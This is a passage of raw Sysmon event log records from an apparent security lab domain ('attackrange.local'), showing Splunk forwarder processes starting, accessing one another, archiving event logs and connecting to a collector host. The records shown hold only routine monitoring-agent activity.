AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50944-false10.0.1.12-8000- 
23542300x80000000000000001046758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCC07BC5A824158CDEC92C0969A001F0,SHA256=1A3BF0849F747147D77E2C47913966A1288B1FA769953A38D07A398C4F60738F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA5FF9CA51531DCDAB896B4EBC01FE12,SHA256=D6B923BF662BF19A5243172BE48C25B4942ACF617245B6ECD3CF70F574EDFA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.979{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4272C45CBC2BD65D328A6F6784C6DD7D,SHA256=371F50472C7D9B9E858C2B155FFD6D64FC7FCE92C5A9A1628D9538948DDAA395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806579Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:50.360{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD29CEE3D25A66B7B91AD3FBF0CF0B60,SHA256=A2C78AE5A2D3C27F19D7DDABE828F1837FEBEA5AE03D96404E9C9426A4BD0E6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.896{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:50.878{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.878{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.879{466BC892-F36A-60EB-FF7C-00000000CF01}7696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001046747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.401{466BC892-F36A-60EB-FE7C-00000000CF01}95249620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:50.201{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.201{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.180{466BC892-F36A-60EB-FE7C-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:48.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57193-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806580Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:51.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A67638ABEBA973B4BB7051542F8D2896,SHA256=F5BD033356C50EA9C276A6CA541E57E7882157BD7E094811476C85DD38EF8B53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.763{466BC892-F36B-60EB-007D-00000000CF01}77368652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.563{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:51.547{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.547{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 